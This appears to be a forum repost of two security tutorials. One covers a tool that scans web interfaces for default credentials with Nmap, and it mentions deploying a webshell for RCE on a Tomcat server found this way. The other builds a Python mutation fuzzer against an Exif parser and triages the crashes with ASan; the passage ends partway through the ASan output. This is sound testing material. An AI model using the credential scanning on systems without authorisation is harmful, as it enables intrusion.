Hunter of Default Logins (Web/HTTP) 2020-04-07 We all like them, don’t we? Those easy default credentials. Surely we do, but looking for them during penetration tests is not always fun. It’s actually hard work! Especially when we have a large environment. How can we check all those different web interfaces? Is there a viable automation? In this article we will present our HTTP default login hunter. Introduction Checking administrative interfaces for weak and default credentials is a vital part of every VAPT exercise. But doing it manually can quickly become exhausting. The problem with web interfaces is that they are all different. And so developing a universal automation that could do the job across multiple interfaces is very hard. Although there are some solutions for this, they are mostly commercial and the functionality is not even that great. Luckily there is a free and open source solution that can help us. NNdefaccts alternate dataset The NNdefaccts dataset made by nnposter is an alternate fingerprint dataset for the Nmap http-default-accounts.nse script. The NNdefaccts dataset can test more than 380 different web interfaces for default logins. For comparison, the latest Nmap 7.80 default dataset only supports 55. Here are some examples of the supported web interfaces: Network devices (3Com, Asus, Cisco, D-Link, F5, Nortel..) Video cameras (AXIS, GeoVision, Hikvision, Sanyo..) Application servers (Apache Tomcat, JBoss EAP..) Monitoring software (Cacti, Nagios, OpenNMS..) Server management (Dell iDRAC, HP iLO..) Web servers (WebLogic, WebSphere..) Printers (Kyocera, Sharp, Xerox..) IP Phones (Cisco, Polycom..) Citrix, NAS4Free, ManageEngine, VMware.. See the following link for a full list: https://github.com/InfosecMatter/http-default-logins/blob/master/list.txt The usage is quite simple – we simply run the Nmap script with the alternate dataset as a parameter. Like this: nmap --script http-default-accounts --script-args http-default-accounts.fingerprintfile=~/http-default-accounts-fingerprints-nndefaccts.lua -p 80 192.168.1.1 This is already pretty great as it is. Nmap script limitations Now the only caveat with this solution is that the http-default-accounts.nse script works only for web servers running on common web ports such as tcp/80, tcp/443 or similar. This is because the script contains a port rule which matches only common web ports. So what if we find a web server running on a different port – say tcp/9999? Unfortunately the Nmap script will not run because of the port rule.. ..unless we modify the port rule in the Nmap script to match our web server port! And that’s exactly where our new tool comes in handy. Introducing default-http-login-hunter The default-http-login-hunter tool, written in Bash, is essentially a wrapper around the aforementioned technologies to unlock their full potential and to make things easy for us. The tool simply takes a URL as an argument: default-http-login-hunter.sh <URL> First it will make a local temporary copy of the http-default-accounts.nse script and it will modify the port rule so that it will match the web server port that we provided in the URL. Then it will run the Nmap command for us and display the output nicely.
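To make the port-rule trick concrete, here is a minimal Python sketch of the same idea: patch a temporary copy of the NSE script so that its portrule accepts an arbitrary port, then point Nmap at the patched copy. The file paths and the exact portrule replacement below are illustrative assumptions, not the wrapper's actual implementation (the real tool is written in Bash).

#!/usr/bin/env python3
# Sketch: run http-default-accounts against an arbitrary port by patching
# a temporary copy of the NSE script. Paths below are assumptions.
import re
import shutil
import subprocess
import tempfile

NSE_SCRIPT = "/usr/share/nmap/scripts/http-default-accounts.nse"    # assumed location
FINGERPRINTS = "http-default-accounts-fingerprints-nndefaccts.lua"  # assumed location

def run_default_login_check(host, port):
    # Work on a temporary copy so the original script stays untouched.
    tmp = tempfile.NamedTemporaryFile(suffix=".nse", delete=False)
    shutil.copyfile(NSE_SCRIPT, tmp.name)
    with open(tmp.name) as f:
        script = f.read()
    # Replace whatever portrule the script ships with by one that matches
    # exactly the port we were given.
    patched = re.sub(r"^portrule\s*=.*$",
                     "portrule = function(host, port) return port.number == %d end" % port,
                     script, count=1, flags=re.MULTILINE)
    with open(tmp.name, "w") as f:
        f.write(patched)
    # Let Nmap do the actual default-login checking with the nndefaccts dataset.
    subprocess.run(["nmap", "-p", str(port),
                    "--script", tmp.name,
                    "--script-args",
                    "http-default-accounts.fingerprintfile=" + FINGERPRINTS,
                    host], check=False)

if __name__ == "__main__":
    run_default_login_check("192.168.1.1", 9999)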
Here’s an example: From the above screenshot we can see that we found default credentials for Apache Tomcat running on port tcp/9999. Now we could deploy a webshell on it and obtain RCE. But that’s another story. Additional features List of URLs The tool also accepts a list of URLs as an input. So for instance, we could feed it with URLs that we extracted from Nessus scan results using our Nessus CSV parser. The tool will go through all the URLs one by one and check for default logins. Like this: default-http-login-hunter.sh urls.txt Here the tool found a default login to the Cisco IronPort running on port https/9443. Resume-friendly Another useful feature is that it saves all the results in the current working directory. So if it gets accidentally interrupted, it will just continue where it stopped. Like in this example: Here we found some Polycom IP phone logins. Staying up-to-date To make sure that we have the latest NNdefaccts dataset, run the update command: default-http-login-hunter.sh update And that’s pretty much it. If you want to see more detailed output, use the -v parameter in the command line. You can find the tool in our InfosecMatter Github repository here. Fingerprint contribution I encourage everyone to check out the NNdefaccts project and consider contributing with fingerprints that you found during your engagements. Contribution is not hard – you can simply record the login procedure in Fiddler, Burp or ZAP and send the session file to the author. Please see more information on the fingerprint contribution here. You may find these links useful while hunting for default logins manually: https://cirt.net/passwords https://www.routerpasswords.com/ Conclusion This tool can be of great help not only while performing internal infrastructure penetration tests, but everywhere we need to test a web interface for default credentials. Its simple design and smart features also make it very easy to use. Hope you will find it useful too! Thanks Lastly, I want to thank nnposter for his awesome NNdefaccts dataset without which this would not be possible and also for his contributions to the Nmap project. Thank you nnposter! Sursa: https://www.infosecmatter.com/hunter-of-default-logins-web-http/
-
Fuzzing Like A Caveman Introduction I’ve been passively consuming a lot of fuzzing-related material in the last few months as I’ve primarily tried to up my Windows exploitation game from Noob-Level to 1%-Less-Noob-Level, and I’ve found it utterly fascinating. In this post I will show you how to create a really simple mutation fuzzer and hopefully we can find some crashes in some open source projects with it. The fuzzer we’ll be creating is from just following along with @gynvael’s fuzzing tutorial on YouTube. I had no idea that Gynvael had streams so now I have dozens more hours of content to add to the never-ending list of things to watch/read. I must also mention that Brandon Faulk’s fuzzing streams are incredible. I don’t understand roughly 99% of the things Brandon says, but these streams are captivating. My personal favorites so far have been his fuzzing of calc.exe and c-tags. He also has this wonderful introduction to fuzzing concepts video here: NYU Fuzzing Talk. Picking a Target I wanted to find a binary that was written in C or C++ and parsed data from a file. One of the first things I came across was binaries that parse Exif data out of images. We also want to pick a target with virtually no security implications since I’m publishing these findings in real time. From https://www.media.mit.edu/pia/Research/deepview/exif.html, Basically, Exif file format is the same as JPEG file format. Exif inserts some of image/digicam information data and thumbnail image to JPEG in conformity to JPEG specification. Therefore you can view Exif format image files by JPEG compliant Internet browser/Picture viewer/Photo retouch software etc. as a usual JPEG image files. So Exif inserts metadata type information into images in conformity with the JPEG spec, and there exists no shortage of programs/utilities which helpfully parse this data out. Getting Started We’ll be using Python3 to build a rudimentary mutation fuzzer that subtly (or not so subtly) alters valid Exif-filled JPEGs and feeds them to a parser hoping for a crash. We’ll also be working on an x86 Kali Linux distro. First things first, we need a valid Exif-filled JPEG. A Google search for ‘Sample JPEG with Exif’ helpfully leads us to this repo. I’ll be using the Canon_40D.jpg image for testing. Getting to Know the JPEG and EXIF Spec Before we start just scribbling Python into Sublime Text, let’s first take some time to learn about the JPEG and Exif specification so that we can avoid some of the more obvious pitfalls of corrupting the image to the point that the parser doesn’t attempt to parse it and wastes precious fuzzing cycles. One thing to know from the previously referenced specification overview is that all JPEG images start with byte values 0xFFD8 and end with byte values 0xFFD9. These first couple of bytes are what are known as ‘magic bytes’. This allows for straightforward file-type identification on *Nix systems. root@kali:~# file Canon_40D.jpg Canon_40D.jpg: JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=11, manufacturer=Canon, model=Canon EOS 40D, orientation=upper-left, xresolution=166, yresolution=174, resolutionunit=2, software=GIMP 2.4.5, datetime=2008:07:31 10:38:11, GPS-Data], baseline, precision 8, 100x68, components 3 We can take the .jpg off and get the same output.
root@kali:~# file Canon Canon: JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=11, manufacturer=Canon, model=Canon EOS 40D, orientation=upper-left, xresolution=166, yresolution=174, resolutionunit=2, software=GIMP 2.4.5, datetime=2008:07:31 10:38:11, GPS-Data], baseline, precision 8, 100x68, components 3 If we hexdump the image, we can see the first and last bytes are in fact 0xFFD8 and 0xFFD9. root@kali:~# hexdump Canon 0000000 d8ff e0ff 1000 464a 4649 0100 0101 4800 ------SNIP------ 0001f10 5aed 5158 d9ff Another interesting piece of information in the specification overview is that ‘markers’ begin with 0xFF. There are several known static markers such as: the ‘Start of Image’ (SOI) marker: 0xFFD8 APP1 marker: 0xFFE1 generic markers: 0xFFXX the ‘End of Image’ (EOI) marker: 0xFFD9 Since we don’t want to change the image length or the file type, let’s go ahead and plan to keep the SOI and EOI markers intact when possible. We don’t want to insert 0xFFD9 into the middle of the image for example as that would truncate the image or cause the parser to misbehave in a non-crashy way. ‘Non-crashy’ is a real word. Also, this could be misguided and maybe we should be randomly putting EOI markers in the byte stream? Let’s see. Starting Our Fuzzer The first thing we’ll need to do is extract all of the bytes from the JPEG we want to use as our ‘valid’ input sample that we’ll of course mutate. Our code will start off like this: #!/usr/bin/env python3 import sys # read bytes from our valid JPEG and return them in a mutable bytearray def get_bytes(filename): f = open(filename, "rb").read() return bytearray(f) if len(sys.argv) < 2: print("Usage: JPEGfuzz.py <valid_jpg>") else: filename = sys.argv[1] data = get_bytes(filename) If we want to see how this data looks, we can print the first 10 or so byte values in the array and see how we’ll be interacting with them. We’ll just temporarily add something like: else: filename = sys.argv[1] data = get_bytes(filename) counter = 0 for x in data: if counter < 10: print(x) counter += 1 Running this shows that we’re dealing with neatly converted decimal integers which makes everything much easier in my opinion. root@kali:~# python3 fuzzer.py Canon_40D.jpg 255 216 255 224 0 16 74 70 73 70 Let’s just quickly see if we can create a new valid JPEG from our byte array. We’ll add this function to our code and run it. def create_new(data): f = open("mutated.jpg", "wb+") f.write(data) f.close() So now we have mutated.jpg in our directory, let’s hash the two files and see if they match. root@kali:~# shasum Canon_40D.jpg mutated.jpg c3d98686223ad69ea29c811aaab35d343ff1ae9e Canon_40D.jpg c3d98686223ad69ea29c811aaab35d343ff1ae9e mutated.jpg Awesome, we have two identical files. Now we can get into the business of mutating the data before creating our mutated.jpg. Mutating We’ll keep our fuzzer relatively simple and only implement two different mutation methods. These methods will be: bit flipping overwriting byte sequences with Gynvael’s ‘Magic Numbers’ Let’s start with bit flipping. 255 (or 0xFF) in binary would be 11111111. If we were to randomly flip a bit in this number, let’s say at index number 2, we’d end up with 11011111. This new number would be 223 or 0xDF. I’m not entirely sure how different this mutation method is from randomly selecting a value from 0 - 255 and overwriting a random byte with it.
My intuition says that bit flipping is extremely similar to randomly overwriting bytes with an arbitrary byte. Let’s go ahead and say we want to only flip a bit in 1% of the bytes we have. We can get to this number in Python by doing: num_of_flips = int((len(data) - 4) * .01) We want to subtract 4 from the length of our bytearray because we don’t want to count the first 2 bytes or the last 2 bytes in our array as those were the SOI and EOI markers and we are aiming to keep those intact. Next we’ll want to randomly select that many indexes and target those indexes for bit flipping. We’ll go ahead and create a range of possible indexes we can change and then choose num_of_flips of them to randomly bit flip. indexes = range(4, (len(data) - 4)) chosen_indexes = [] # iterate selecting indexes until we've hit our num_of_flips number counter = 0 while counter < num_of_flips: chosen_indexes.append(random.choice(indexes)) counter += 1 Let’s add import random to our script, and also add these debug print statements to make sure everything is working correctly. print("Number of indexes chosen: " + str(len(chosen_indexes))) print("Indexes chosen: " + str(chosen_indexes)) Our function right now looks like this: def bit_flip(data): num_of_flips = int((len(data) - 4) * .01) indexes = range(4, (len(data) - 4)) chosen_indexes = [] # iterate selecting indexes until we've hit our num_of_flips number counter = 0 while counter < num_of_flips: chosen_indexes.append(random.choice(indexes)) counter += 1 print("Number of indexes chosen: " + str(len(chosen_indexes))) print("Indexes chosen: " + str(chosen_indexes)) If we run this, we get a nice output as expected: root@kali:~# python3 fuzzer.py Canon_40D.jpg Number of indexes chosen: 79 Indexes chosen: [6580, 930, 6849, 6007, 5020, 33, 474, 4051, 7722, 5393, 3540, 54, 5290, 2106, 2544, 1786, 5969, 5211, 2256, 510, 7147, 3370, 625, 5845, 2082, 2451, 7500, 3672, 2736, 2462, 5395, 7942, 2392, 1201, 3274, 7629, 5119, 1977, 2986, 7590, 1633, 4598, 1834, 445, 481, 7823, 7708, 6840, 1596, 5212, 4277, 3894, 2860, 2912, 6755, 3557, 3535, 3745, 1780, 252, 6128, 7187, 500, 1051, 4372, 5138, 3305, 872, 6258, 2136, 3486, 5600, 651, 1624, 4368, 7076, 1802, 2335, 3553] Next we need to actually mutate the bytes at those indexes. We need to bit flip them. I chose to do this in a really hacky way, feel free to implement your own solution. We’re going to convert the bytes at these indexes to binary strings and pad them so that they are 8 digits long. Let’s add this code and see what I’m talking about. We’ll be converting the byte value (which is in decimal remember) to a binary string and then padding it with leading zeroes if it’s less than 8 digits long. The last line is a temporary print statement for debugging. for x in chosen_indexes: current = data[x] current = (bin(current).replace("0b","")) current = "0" * (8 - len(current)) + current As you can see, we have a nice output of binary numbers as strings. root@kali:~# python3 fuzzer.py Canon_40D.jpg 10100110 10111110 10010010 00110000 01110001 00110101 00110010 -----SNIP----- Now for each of these, we’ll randomly select an index, and flip it. Take the first one, 10100110: if we select index 0, we have a 1, so we’ll flip it to 0. The last consideration for this code segment is that these are strings, not integers, remember. So the last thing we need to do is convert the flipped binary string to an integer.
We’ll create an empty list, add each digit to the list, flip the digit we randomly picked, and then construct a new string from all the list members. (We have to use this intermediate list step since strings are immutable). Finally, we convert it to an integer and return the data to our create_new() function to create a new JPEG. Our script now looks like this in total: #!/usr/bin/env python3 import sys import random # read bytes from our valid JPEG and return them in a mutable bytearray def get_bytes(filename): f = open(filename, "rb").read() return bytearray(f) def bit_flip(data): num_of_flips = int((len(data) - 4) * .01) indexes = range(4, (len(data) - 4)) chosen_indexes = [] # iterate selecting indexes until we've hit our num_of_flips number counter = 0 while counter < num_of_flips: chosen_indexes.append(random.choice(indexes)) counter += 1 for x in chosen_indexes: current = data[x] current = (bin(current).replace("0b","")) current = "0" * (8 - len(current)) + current indexes = range(0,8) picked_index = random.choice(indexes) new_number = [] # our new_number list now has all the digits, example: ['1', '0', '1', '0', '1', '0', '1', '0'] for i in current: new_number.append(i) # if the number at our randomly selected index is a 1, make it a 0, and vice versa if new_number[picked_index] == "1": new_number[picked_index] = "0" else: new_number[picked_index] = "1" # create our new binary string of our bit-flipped number current = '' for i in new_number: current += i # convert that string to an integer current = int(current,2) # change the number in our byte array to our new number we just constructed data[x] = current return data # create new jpg with mutated data def create_new(data): f = open("mutated.jpg", "wb+") f.write(data) f.close() if len(sys.argv) < 2: print("Usage: JPEGfuzz.py <valid_jpg>") else: filename = sys.argv[1] data = get_bytes(filename) mutated_data = bit_flip(data) create_new(mutated_data) Analyzing Mutation If we run our script, we can shasum the output and compare to the original JPEG. root@kali:~# shasum Canon_40D.jpg mutated.jpg c3d98686223ad69ea29c811aaab35d343ff1ae9e Canon_40D.jpg a7b619028af3d8e5ac106a697b06efcde0649249 mutated.jpg This looks promising as they have different hashes now. We can further analyze by comparing them with a program called Beyond Compare or bcompare. We’ll get two hexdumps with differences highlighted. As you can see, in just this one screen share we have 3 different bytes that have had their bits flipped. The original is on the left, the mutated sample is on the right. This mutation method appears to have worked. Let’s move on to implementing our second mutation method. Gynvael’s Magic Numbers During the aforementioned GynvaelColdwind ‘Basics of fuzzing’ stream, he enumerates several ‘magic numbers’ which can have devastating effects on programs. Typically, these numbers relate to data type sizes and arithmetic-induced errors. The numbers discussed were: 0xFF 0x7F 0x00 0xFFFF 0x0000 0xFFFFFFFF 0x00000000 0x80000000 <—- minimum 32-bit int 0x40000000 <—- just half of that amount 0x7FFFFFFF <—- max 32-bit int If there is any kind of arithmetic performed on these types of values in the course of malloc() or other types of operations, overflows can be common. For instance, if you add 0x1 to 0xFF on a one-byte register, it would roll over to 0x00, which can be unintended behavior. HEVD actually has an integer overflow bug similar to this concept.
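As a quick aside (my illustration, not from the original post), the rollover is easy to demonstrate in Python by masking arithmetic to a fixed width, which is effectively what happens in a one-byte register or in a 32-bit size calculation:

# Illustration only: emulate fixed-width integer arithmetic with masks.
one_byte = 0xFF
print(hex((one_byte + 0x1) & 0xFF))        # 0x0 -> the one-byte value rolls over

# The same idea at 32 bits: a "size + header" calculation can wrap to a tiny
# value, so a subsequent allocation ends up much smaller than the caller expects.
size = 0xFFFFFFFF
header = 0x10
print(hex((size + header) & 0xFFFFFFFF))   # 0xf -> classic overflow-to-small-alloc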
Let’s say our fuzzer chooses 0x7FFFFFFF as the magic number it wants to use. That value is 4 bytes long, so we would have to find a byte index in our array, and overwrite that byte plus the next three. Let’s go ahead and start implementing this in our fuzzer. Implementing Mutation Method #2 First we’ll want to create a list of tuples like Gynvael did where the first number in the tuple is the byte-size of the magic number and the second number is the byte value in decimal of the first byte. def magic(data): magic_vals = [ (1, 255), (1, 255), (1, 127), (1, 0), (2, 255), (2, 0), (4, 255), (4, 0), (4, 128), (4, 64), (4, 127) ] picked_magic = random.choice(magic_vals) print(picked_magic) If we run this we can see that it’s randomly selecting a magic value tuple. root@kali:~# python3 fuzzer.py Canon_40D.jpg (4, 64) root@kali:~# python3 fuzzer.py Canon_40D.jpg (4, 128) root@kali:~# python3 fuzzer.py Canon_40D.jpg (4, 0) root@kali:~# python3 fuzzer.py Canon_40D.jpg (2, 255) root@kali:~# python3 fuzzer.py Canon_40D.jpg (4, 0) We now need to overwrite a random 1 to 4 byte value in the JPEG with this new magic 1 to 4 byte value. We will set up our possible indexes the same as the previous method, select an index, and then overwrite the bytes at that index with our picked_magic number. So if we get (4, 128) for instance, we know it’s 4 bytes, and the magic number is 0x80000000. So we’ll do something like: byte[x] = 128 byte[x+1] = 0 byte[x+2] = 0 byte[x+3] = 0 All in all, our function will look like this: def magic(data): magic_vals = [ (1, 255), (1, 255), (1, 127), (1, 0), (2, 255), (2, 0), (4, 255), (4, 0), (4, 128), (4, 64), (4, 127) ] picked_magic = random.choice(magic_vals) length = len(data) - 8 index = range(0, length) picked_index = random.choice(index) # here we are hardcoding all the byte overwrites for all of the tuples that begin (1, ) if picked_magic[0] == 1: if picked_magic[1] == 255: # 0xFF data[picked_index] = 255 elif picked_magic[1] == 127: # 0x7F data[picked_index] = 127 elif picked_magic[1] == 0: # 0x00 data[picked_index] = 0 # here we are hardcoding all the byte overwrites for all of the tuples that begin (2, ) elif picked_magic[0] == 2: if picked_magic[1] == 255: # 0xFFFF data[picked_index] = 255 data[picked_index + 1] = 255 elif picked_magic[1] == 0: # 0x0000 data[picked_index] = 0 data[picked_index + 1] = 0 # here we are hardcoding all of the byte overwrites for all of the tuples that begin (4, ) elif picked_magic[0] == 4: if picked_magic[1] == 255: # 0xFFFFFFFF data[picked_index] = 255 data[picked_index + 1] = 255 data[picked_index + 2] = 255 data[picked_index + 3] = 255 elif picked_magic[1] == 0: # 0x00000000 data[picked_index] = 0 data[picked_index + 1] = 0 data[picked_index + 2] = 0 data[picked_index + 3] = 0 elif picked_magic[1] == 128: # 0x80000000 data[picked_index] = 128 data[picked_index + 1] = 0 data[picked_index + 2] = 0 data[picked_index + 3] = 0 elif picked_magic[1] == 64: # 0x40000000 data[picked_index] = 64 data[picked_index + 1] = 0 data[picked_index + 2] = 0 data[picked_index + 3] = 0 elif picked_magic[1] == 127: # 0x7FFFFFFF data[picked_index] = 127 data[picked_index + 1] = 255 data[picked_index + 2] = 255 data[picked_index + 3] = 255 return data Analyzing Mutation #2 Running our script now and analyzing the results in Beyond Compare, we can see that a two byte value of 0xA6 0x76 was overwritten with 0xFF 0xFF. This is exactly what we wanted to accomplish.
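The long if/elif chain above works, but the same effect can be achieved by deriving the individual bytes from the magic value itself. The snippet below is an equivalent, more compact variant (my rewrite for illustration, not the code used in the post):

import random

def magic_compact(data):
    # (width in bytes, value) pairs covering the same magic numbers as before
    magic_vals = [
        (1, 0xFF), (1, 0x7F), (1, 0x00),
        (2, 0xFFFF), (2, 0x0000),
        (4, 0xFFFFFFFF), (4, 0x00000000),
        (4, 0x80000000), (4, 0x40000000), (4, 0x7FFFFFFF),
    ]
    width, value = random.choice(magic_vals)
    picked_index = random.choice(range(0, len(data) - 8))
    # Split the value into `width` big-endian bytes and overwrite in place,
    # matching the byte order the hardcoded version used (e.g. 0x80 00 00 00).
    for i, b in enumerate(value.to_bytes(width, "big")):
        data[picked_index + i] = b
    return data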
Starting to Fuzz Now that we have two reliable ways of mutating the data, we need to: mutate the data with one of our functions, create new picture with mutated data, feed mutated picture to our binary for parsing, catch any Segmentation faults and log the picture that caused it Victim? For our victim program, we will search Google with site:github.com "exif" language:c to find Github projects written in C that have a reference to ‘exif’. A quick looksie brings us to https://github.com/mkttanabe/exif. We can install by git cloning the repo, and using the building with gcc instructions included in the README. (I’ve placed the compiled binary in /usr/bin just for ease.) Let’s first see how the program handles our valid JPEG. root@kali:~# exif Canon_40D.jpg -verbose system: little-endian data: little-endian [Canon_40D.jpg] createIfdTableArray: result=5 {0TH IFD} tags=11 tag[00] 0x010F Make type=2 count=6 val=[Canon] tag[01] 0x0110 Model type=2 count=14 val=[Canon EOS 40D] tag[02] 0x0112 Orientation type=3 count=1 val=1 tag[03] 0x011A XResolution type=5 count=1 val=72/1 tag[04] 0x011B YResolution type=5 count=1 val=72/1 tag[05] 0x0128 ResolutionUnit type=3 count=1 val=2 tag[06] 0x0131 Software type=2 count=11 val=[GIMP 2.4.5] tag[07] 0x0132 DateTime type=2 count=20 val=[2008:07:31 10:38:11] tag[08] 0x0213 YCbCrPositioning type=3 count=1 val=2 tag[09] 0x8769 ExifIFDPointer type=4 count=1 val=214 tag[10] 0x8825 GPSInfoIFDPointer type=4 count=1 val=978 {EXIF IFD} tags=30 tag[00] 0x829A ExposureTime type=5 count=1 val=1/160 tag[01] 0x829D FNumber type=5 count=1 val=71/10 tag[02] 0x8822 ExposureProgram type=3 count=1 val=1 tag[03] 0x8827 PhotographicSensitivity type=3 count=1 val=100 tag[04] 0x9000 ExifVersion type=7 count=4 val=0 2 2 1 tag[05] 0x9003 DateTimeOriginal type=2 count=20 val=[2008:05:30 15:56:01] tag[06] 0x9004 DateTimeDigitized type=2 count=20 val=[2008:05:30 15:56:01] tag[07] 0x9101 ComponentsConfiguration type=7 count=4 val=0x01 0x02 0x03 0x00 tag[08] 0x9201 ShutterSpeedValue type=10 count=1 val=483328/65536 tag[09] 0x9202 ApertureValue type=5 count=1 val=368640/65536 tag[10] 0x9204 ExposureBiasValue type=10 count=1 val=0/1 tag[11] 0x9207 MeteringMode type=3 count=1 val=5 tag[12] 0x9209 Flash type=3 count=1 val=9 tag[13] 0x920A FocalLength type=5 count=1 val=135/1 tag[14] 0x9286 UserComment type=7 count=264 val=0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 (omitted) tag[15] 0x9290 SubSecTime type=2 count=3 val=[00] tag[16] 0x9291 SubSecTimeOriginal type=2 count=3 val=[00] tag[17] 0x9292 SubSecTimeDigitized type=2 count=3 val=[00] tag[18] 0xA000 FlashPixVersion type=7 count=4 val=0 1 0 0 tag[19] 0xA001 ColorSpace type=3 count=1 val=1 tag[20] 0xA002 PixelXDimension type=4 count=1 val=100 tag[21] 0xA003 PixelYDimension type=4 count=1 val=68 tag[22] 0xA005 InteroperabilityIFDPointer type=4 count=1 val=948 tag[23] 0xA20E FocalPlaneXResolution type=5 count=1 val=3888000/876 tag[24] 0xA20F FocalPlaneYResolution type=5 count=1 val=2592000/583 tag[25] 0xA210 FocalPlaneResolutionUnit type=3 count=1 val=2 tag[26] 0xA401 CustomRendered type=3 count=1 val=0 tag[27] 0xA402 ExposureMode type=3 count=1 val=1 tag[28] 0xA403 WhiteBalance type=3 count=1 val=0 tag[29] 0xA406 SceneCaptureType type=3 count=1 val=0 {Interoperability IFD} tags=2 tag[00] 0x0001 InteroperabilityIndex type=2 count=4 val=[R98] tag[01] 0x0002 InteroperabilityVersion type=7 count=4 val=0 1 0 0 {GPS IFD} tags=1 tag[00] 0x0000 GPSVersionID type=1 count=4 val=2 2 0 0 {1ST IFD} tags=6 tag[00] 0x0103 
Compression type=3 count=1 val=6 tag[01] 0x011A XResolution type=5 count=1 val=72/1 tag[02] 0x011B YResolution type=5 count=1 val=72/1 tag[03] 0x0128 ResolutionUnit type=3 count=1 val=2 tag[04] 0x0201 JPEGInterchangeFormat type=4 count=1 val=1090 tag[05] 0x0202 JPEGInterchangeFormatLength type=4 count=1 val=1378 0th IFD : Model = [Canon EOS 40D] Exif IFD : DateTimeOriginal = [2008:05:30 15:56:01] We see that the program is parsing out the tags and stating the byte values associated with them. This is pretty much exactly what we set out to find. Chasing Segfaults Ideally we’d like to feed this binary some mutated data and have it segfault meaning we have found a bug. The problem I ran into was that when I monitored stdout and stderr for the Segmentation fault message, it never appeared. That’s because the Segmentation fault message comes from our command shell instead of the binary. It means the shell received a SIGSEGV signal and in response prints the message. One way I found to monitor this was to use the run() method from the pexpect Python module and the quote() method from the pipes Python module. We’ll add a new function, that will take in a counter parameter which will be what fuzzing iteration we’re on and also the mutated data in another parameter. If we see Segmentation in the output of our run() command, we’ll write the mutated data to a file and save it so that we have the JPEG image that crashed the binary. Let’s create a new folder called crashes and we’ll save JPEGs in there that cause crashes in the format crash.<fuzzing iteration (counter)>.jpg. So if fuzzing iteration 100 caused a crash, we should get a file like: /crashes/crash.100.jpg. We’ll keep printing to the same line in the terminal to keep a count of every 100 fuzzing iterations. Our function looks like this: def exif(counter,data): command = "exif mutated.jpg -verbose" out, returncode = run("sh -c " + quote(command), withexitstatus=1) if b"Segmentation" in out: f = open("crashes/crash.{}.jpg".format(str(counter)), "ab+") f.write(data) if counter % 100 == 0: print(counter, end="\r") Next, we’ll alter our execution stub at the bottom of our script to run on a counter. Once we hit 1000 iterations, we’ll stop fuzzing. We’ll also have our fuzzer randomly select one of our mutation methods. So it might bit-flip or it might use a magic number. Let’s run it and then check our crashes folder when it completes. Once the fuzzer completes, you can see we got ~30 crashes! root@kali:~/crashes# ls crash.102.jpg crash.317.jpg crash.52.jpg crash.620.jpg crash.856.jpg crash.129.jpg crash.324.jpg crash.551.jpg crash.694.jpg crash.861.jpg crash.152.jpg crash.327.jpg crash.559.jpg crash.718.jpg crash.86.jpg crash.196.jpg crash.362.jpg crash.581.jpg crash.775.jpg crash.984.jpg crash.252.jpg crash.395.jpg crash.590.jpg crash.785.jpg crash.985.jpg crash.285.jpg crash.44.jpg crash.610.jpg crash.84.jpg crash.987.jpg We can test this now with a quick one-liner to confirm the results: root@kali:~/crashes# for i in *.jpg; do exif "$i" -verbose > /dev/null 2>&1; done. Remember, we can route both STDOUT and STDERR to /dev/null because “Segmentation fault” comes from the shell, not from the binary. 
We run this and this is the output: root@kali:~/crashes# for i in *.jpg; do exif "$i" -verbose > /dev/null 2>&1; done Segmentation fault Segmentation fault Segmentation fault Segmentation fault Segmentation fault Segmentation fault Segmentation fault -----SNIP----- You can’t see all of them, but that’s 30 segfaults, so everything appears to be working as planned! Triaging Crashes Now that we have ~30 crashes and the JPEGs that caused them, the next step would be to analyze these crashes and figure out how many of them are unique. This is where we’ll leverage some of the things I’ve learned watching Brandon Faulk’s streams. A quick look at the crash samples in Beyond Compare tells me that most were caused by our bit_flip() mutation and not the magic() mutation method. Interesting. As a test, while we progress, we can turn off the randomness of the function selection and run let’s say 100,000 iterations with just the magic() mutator and see if we get any crashes. Using ASan to Analyze Crashes ASan is the “Address Sanitizer” and it’s a utility that comes with newer versions of gcc that allows users to compile a binary with the -fsanitize=address switch and get access to very detailed information in the event that a memory access bug occurs, even bugs that don’t cause a crash. Obviously we’ve pre-selected for crashing inputs here so we will miss out on that utility but perhaps we’ll save it for another time. To use ASan, I followed along with the Fuzzing Project and recompiled exif with the flags: cc -fsanitize=address -ggdb -o exifsan sample_main.c exif.c. I then moved exifsan to /usr/bin for ease of use. If we run this newly compiled binary on a crash sample, let’s see the output. root@kali:~/crashes# exifsan crash.252.jpg -verbose system: little-endian data: little-endian ================================================================= ==18831==ERROR: AddressSanitizer: heap-buffer-overflow on address 0xb4d00758 at pc 0x00415b9e bp 0xbf8c91f8 sp 0xbf8c91ec READ of size 4 at 0xb4d00758 thread T0 #0 0x415b9d in parseIFD /root/exif/exif.c:2356 #1 0x408f10 in createIfdTableArray /root/exif/exif.c:271 #2 0x4076ba in main /root/exif/sample_main.c:63 #3 0xb77d0ef0 in __libc_start_main ../csu/libc-start.c:308 #4 0x407310 in _start (/usr/bin/exifsan+0x2310) 0xb4d00758 is located 0 bytes to the right of 8-byte region [0xb4d00750,0xb4d00758) allocated by thread T0 here: #0 0xb7aa2097 in __interceptor_malloc (/lib/i386-linux-gnu/libasan.so.5+0x10c097) #1 0x415a9f in parseIFD /root/exif/exif.c:2348 #2 0x408f10 in createIfdTableArray /root/exif/exif.c:271 #3 0x4076ba in main /root/exif/sample_main.c:63 #4 0xb77d0ef0 in __libc_start_main ../csu/libc-start.c:308 SUMMARY: AddressSanitizer: heap-buffer-overflow /root/exif/exif.c:2356 in parseIFD Shadow bytes around the buggy address: 0x369a0090: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x369a00a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x369a00b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x369a00c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x369a00d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa =>0x369a00e0: fa fa fa fa fa fa fa fa fa fa 00[fa]fa fa 04 fa 0x369a00f0: fa fa 00 06 fa fa 06 fa fa fa fa fa fa fa fa fa 0x369a0100: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x369a0110: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x369a0120: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x369a0130: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes):
